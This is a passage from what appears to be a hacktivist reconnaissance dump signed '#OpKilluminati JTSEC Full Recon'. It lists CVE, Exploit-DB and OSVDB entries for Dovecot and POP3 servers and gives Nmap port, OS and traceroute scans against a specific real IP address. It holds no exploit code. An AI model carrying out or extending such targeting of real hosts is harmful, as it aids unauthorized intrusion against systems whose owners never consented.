17243| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
17244| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
17245| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
17246| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
17247| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
17248| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
17249| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
17250| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
17251| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
17252| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
17253| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
17254| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
17255| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
17256| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
17257| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
17258| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
17259| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
17260| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
17261| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
17262| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
17263| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
17264| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
17265| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
17266| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
17267| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
17268| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
17269| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
17270| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
17271| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
17272|
17273| SecurityFocus - https://www.securityfocus.com/bid/:
17274| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
17275| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
17276| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
17277| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
17278| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
17279| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
17280| [67306] Dovecot Denial of Service Vulnerability
17281| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
17282| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
17283| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
17284| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
17285| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
17286| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
17287| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
17288| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
17289| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
17290| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
17291| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
17292| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
17293| [39838] tpop3d Remote Denial of Service Vulnerability
17294| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
17295| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
17296| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
17297| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
17298| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
17299| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
17300| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
17301| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
17302| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
17303| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
17304| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
17305| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
17306| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
17307| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
17308| [17961] Dovecot Remote Information Disclosure Vulnerability
17309| [16672] Dovecot Double Free Denial of Service Vulnerability
17310| [8495] akpop3d User Name SQL Injection Vulnerability
17311| [8473] Vpop3d Remote Denial Of Service Vulnerability
17312| [3990] ZPop3D Bad Login Logging Failure Vulnerability
17313| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
17314|
17315| IBM X-Force - https://exchange.xforce.ibmcloud.com:
17316| [86382] Dovecot POP3 Service denial of service
17317| [84396] Dovecot IMAP APPEND denial of service
17318| [80453] Dovecot mail-search.c denial of service
17319| [71354] Dovecot SSL Common Name (CN) weak security
17320| [67675] Dovecot script-login security bypass
17321| [67674] Dovecot script-login directory traversal
17322| [67589] Dovecot header name denial of service
17323| [63267] Apple Mac OS X Dovecot information disclosure
17324| [62340] Dovecot mailbox security bypass
17325| [62339] Dovecot IMAP or POP3 denial of service
17326| [62256] Dovecot mailbox security bypass
17327| [62255] Dovecot ACL entry security bypass
17328| [60639] Dovecot ACL plugin weak security
17329| [57267] Apple Mac OS X Dovecot Kerberos security bypass
17330| [56763] Dovecot header denial of service
17331| [54363] Dovecot base_dir privilege escalation
17332| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
17333| [46323] Dovecot dovecot.conf information disclosure
17334| [46227] Dovecot message parsing denial of service
17335| [45669] Dovecot ACL mailbox security bypass
17336| [45667] Dovecot ACL plugin rights security bypass
17337| [41085] Dovecot TAB characters authentication bypass
17338| [41009] Dovecot mail_extra_groups option unauthorized access
17339| [39342] Dovecot LDAP auth cache configuration security bypass
17340| [35767] Dovecot ACL plugin security bypass
17341| [34082] Dovecot mbox-storage.c directory traversal
17342| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
17343| [26578] Cyrus IMAP pop3d buffer overflow
17344| [26536] Dovecot IMAP LIST information disclosure
17345| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
17346| [24709] Dovecot APPEND command denial of service
17347| [13018] akpop3d authentication code SQL injection
17348| [7345] Slackware Linux imapd and ipop3d core dump
17349| [6269] imap, ipop2d and ipop3d buffer overflows
17350| [5923] Linuxconf vpop3d symbolic link
17351| [4918] IPOP3D, Buffer overflow attack
17352| [1560] IPOP3D, user login successful
17353| [1559] IPOP3D user login to remote host successful
17354| [1525] IPOP3D, user logout
17355| [1524] IPOP3D, user auto-logout
17356| [1523] IPOP3D, user login failure
17357| [1522] IPOP3D, brute force attack
17358| [1521] IPOP3D, user kiss of death logout
17359| [418] pop3d mktemp creates insecure temporary files
17360|
| Exploit-DB - https://www.exploit-db.com:
| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
| [23053] Vpop3d Remote Denial of Service Vulnerability
| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
| [11893] tPop3d 1.5.3 DoS
| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
| [901025] Dovecot Version Detection
| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
| [870607] RedHat Update for dovecot RHSA-2011:0600-01
| [870471] RedHat Update for dovecot RHSA-2011:1187-01
| [870153] RedHat Update for dovecot RHSA-2008:0297-02
| [863272] Fedora Update for dovecot FEDORA-2011-7612
| [863115] Fedora Update for dovecot FEDORA-2011-7258
| [861525] Fedora Update for dovecot FEDORA-2007-664
| [861394] Fedora Update for dovecot FEDORA-2007-493
| [861333] Fedora Update for dovecot FEDORA-2007-1485
| [860845] Fedora Update for dovecot FEDORA-2008-9202
| [860663] Fedora Update for dovecot FEDORA-2008-2475
| [860169] Fedora Update for dovecot FEDORA-2008-2464
| [860089] Fedora Update for dovecot FEDORA-2008-9232
| [840950] Ubuntu Update for dovecot USN-1295-1
| [840668] Ubuntu Update for dovecot USN-1143-1
| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
| [70259] FreeBSD Ports: dovecot
| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
| [66522] FreeBSD Ports: dovecot
| [65010] Ubuntu USN-838-1 (dovecot)
| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
| [62854] FreeBSD Ports: dovecot-managesieve
| [61916] FreeBSD Ports: dovecot
| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
| [60528] FreeBSD Ports: dovecot
| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
| [60089] FreeBSD Ports: dovecot
| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
|
| SecurityTracker - https://www.securitytracker.com:
| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
|
| OSVDB - http://www.osvdb.org:
| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
| [66113] Dovecot Mail Root Directory Creation Permission Weakness
| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
| [66110] Dovecot Multiple Unspecified Buffer Overflows
| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
| [64783] Dovecot E-mail Message Header Unspecified DoS
| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
| [62796] Dovecot mbox Format Email Header Handling DoS
| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
| [43137] Dovecot mail_extra_groups Symlink File Manipulation
| [42979] Dovecot passdbs Argument Injection Authentication Bypass
| [39876] Dovecot LDAP Auth Cache Security Bypass
| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
| [23281] Dovecot imap/pop3-login dovecot-auth DoS
| [23280] Dovecot Malformed APPEND Command DoS
| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
| [5857] Linux pop3d Arbitrary Mail File Access
| [2471] akpop3d username SQL Injection
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (89%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 - 3.16 (86%), Linux 4.0 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.2 - 4.9 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 17 hops

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 129.73 ms 10.245.200.1
2 ...
3 130.37 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
4 130.36 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
5 135.74 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
6 154.41 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
7 166.02 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
8 163.64 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
9 163.66 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
10 163.65 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
11 254.88 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
12 256.27 ms 204.70.192.125
13 250.75 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
14 255.18 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
15 251.92 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
16 253.37 ms 64.89.38.2
17 249.96 ms 192.252.144.58
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:21 EST
NSE: Loaded 163 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:21
Completed NSE at 08:21, 0.00s elapsed
Initiating NSE at 08:21
Completed NSE at 08:21, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:21
Completed Parallel DNS resolution of 1 host. at 08:21, 0.02s elapsed
Initiating SYN Stealth Scan at 08:21
Scanning 192.252.144.58 [1 port]
Completed SYN Stealth Scan at 08:21, 2.04s elapsed (1 total ports)
Initiating Service scan at 08:21
Initiating OS detection (try #1) against 192.252.144.58
Retrying OS detection (try #2) against 192.252.144.58
Initiating Traceroute at 08:21
Completed Traceroute at 08:21, 3.02s elapsed
Initiating Parallel DNS resolution of 16 hosts. at 08:21
Completed Parallel DNS resolution of 16 hosts. at 08:21, 0.41s elapsed
NSE: Script scanning 192.252.144.58.
Initiating NSE at 08:21
Completed NSE at 08:21, 0.01s elapsed
Initiating NSE at 08:21
Completed NSE at 08:21, 0.00s elapsed
Nmap scan report for 192.252.144.58
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
443/tcp filtered https
Too many fingerprints match this host to give specific OS details
Network Distance: 17 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 135.05 ms 10.245.200.1
2 ...
3 135.85 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
4 135.69 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
5 141.24 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
6 163.31 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
7 172.15 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
8 167.73 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
9 172.12 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
10 163.58 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
11 261.42 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
12 260.32 ms 204.70.192.125
13 254.33 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
14 255.77 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
15 252.74 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
16 256.65 ms 64.89.38.2
17 260.62 ms 192.252.144.58

NSE: Script Post-scanning.
Initiating NSE at 08:21
Completed NSE at 08:21, 0.00s elapsed
Initiating NSE at 08:21
Completed NSE at 08:21, 0.00s elapsed
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:24 EST
Nmap scan report for 192.252.144.58
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
3306/tcp filtered mysql
Too many fingerprints match this host to give specific OS details
Network Distance: 17 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 139.36 ms 10.245.200.1
2 ...
3 141.64 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
4 141.64 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
5 143.96 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
6 166.17 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
7 167.16 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
8 163.79 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
9 166.79 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
10 163.43 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
11 256.33 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
12 257.23 ms 204.70.192.125
13 251.42 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
14 256.51 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
15 252.76 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
16 254.34 ms 64.89.38.2
17 258.13 ms 192.252.144.58
#######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:25 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:25
Completed NSE at 08:25, 0.00s elapsed
Initiating NSE at 08:25
Completed NSE at 08:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:25
Completed Parallel DNS resolution of 1 host. at 08:25, 0.03s elapsed
Initiating SYN Stealth Scan at 08:25
Scanning 192.252.144.58 [65535 ports]
SYN Stealth Scan Timing: About 8.04% done; ETC: 08:32 (0:05:55 remaining)
SYN Stealth Scan Timing: About 27.15% done; ETC: 08:29 (0:02:44 remaining)
SYN Stealth Scan Timing: About 41.37% done; ETC: 08:29 (0:02:09 remaining)
SYN Stealth Scan Timing: About 58.19% done; ETC: 08:29 (0:01:27 remaining)
SYN Stealth Scan Timing: About 76.86% done; ETC: 08:28 (0:00:45 remaining)
Completed SYN Stealth Scan at 08:28, 187.43s elapsed (65535 total ports)
Initiating Service scan at 08:28
Initiating OS detection (try #1) against 192.252.144.58
Retrying OS detection (try #2) against 192.252.144.58
Initiating Traceroute at 08:28
Completed Traceroute at 08:28, 0.14s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 08:28
Completed Parallel DNS resolution of 2 hosts. at 08:28, 0.02s elapsed
NSE: Script scanning 192.252.144.58.
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
Nmap scan report for 192.252.144.58
Host is up (0.13s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
25/tcp closed smtp
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hops

TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 134.74 ms 10.245.200.1
2 134.73 ms 192.252.144.58

NSE: Script Post-scanning.
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
######################################################################################################################################
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:28 EST
NSE: Loaded 47 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
Initiating NSE at 08:28
Completed NSE at 08:28, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:28
Completed Parallel DNS resolution of 1 host. at 08:28, 0.02s elapsed
Initiating UDP Scan at 08:28
Scanning 192.252.144.58 [15 ports]
Completed UDP Scan at 08:28, 2.30s elapsed (15 total ports)
Initiating Service scan at 08:28
Scanning 12 services on 192.252.144.58
Service scan Timing: About 8.33% done; ETC: 08:48 (0:17:58 remaining)
Completed Service scan at 08:30, 102.59s elapsed (12 services on 1 host)
Initiating OS detection (try #1) against 192.252.144.58
Retrying OS detection (try #2) against 192.252.144.58
Initiating Traceroute at 08:30
Completed Traceroute at 08:30, 7.16s elapsed
Initiating Parallel DNS resolution of 1 host. at 08:30
Completed Parallel DNS resolution of 1 host. at 08:30, 0.00s elapsed
NSE: Script scanning 192.252.144.58.
Initiating NSE at 08:30
Completed NSE at 08:30, 7.14s elapsed
Initiating NSE at 08:30
Completed NSE at 08:30, 1.18s elapsed
Nmap scan report for 192.252.144.58
Host is up (0.21s latency).

PORT STATE SERVICE VERSION
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
88/udp open|filtered kerberos-sec
123/udp open|filtered ntp
137/udp filtered netbios-ns
138/udp filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
389/udp open|filtered ldap
500/udp open|filtered isakmp
|_ike-version: ERROR: Script execution failed (use -d to debug)
520/udp open|filtered route
2049/udp closed nfs
Too many fingerprints match this host to give specific OS details
Network Distance: 17 hops

TRACEROUTE (using port 137/udp)
HOP RTT ADDRESS
1 ... 7
8 129.94 ms 10.245.200.1
9 ... 10
11 130.78 ms 10.245.200.1
12 134.78 ms 10.245.200.1
13 134.78 ms 10.245.200.1
14 134.78 ms 10.245.200.1
15 134.76 ms 10.245.200.1
16 129.23 ms 10.245.200.1
17 129.25 ms 10.245.200.1
18 ...
19 129.65 ms 10.245.200.1
20 129.51 ms 10.245.200.1
21 ... 28
29 129.75 ms 10.245.200.1
30 131.41 ms 10.245.200.1

NSE: Script Post-scanning.
Initiating NSE at 08:30
Completed NSE at 08:30, 0.00s elapsed
Initiating NSE at 08:30
Completed NSE at 08:30, 0.00s elapsed
#######################################################################################################################################
 Anonymous #OpKilluminati JTSEC Full Recon #22